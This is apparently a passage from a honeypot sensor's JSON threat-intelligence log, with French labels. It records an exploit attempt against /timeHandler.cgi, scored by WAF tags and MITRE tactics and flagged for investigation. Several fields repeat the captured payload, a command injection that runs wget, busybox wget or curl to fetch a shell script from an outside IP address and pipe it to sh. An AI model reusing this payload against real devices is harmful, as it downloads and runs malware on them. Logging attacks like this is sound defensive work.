\u0022\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022query_string\u0022: \u0022time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:808\u0022, \u0022payload_snippet\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022af583d472f8a762847a7ed1f1a0a1c53101fa4f5\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022request_line\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wge\u2026\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8080, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022request_line\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/w\u2026\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wge\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228080\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8080","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":280}],"total_events":90}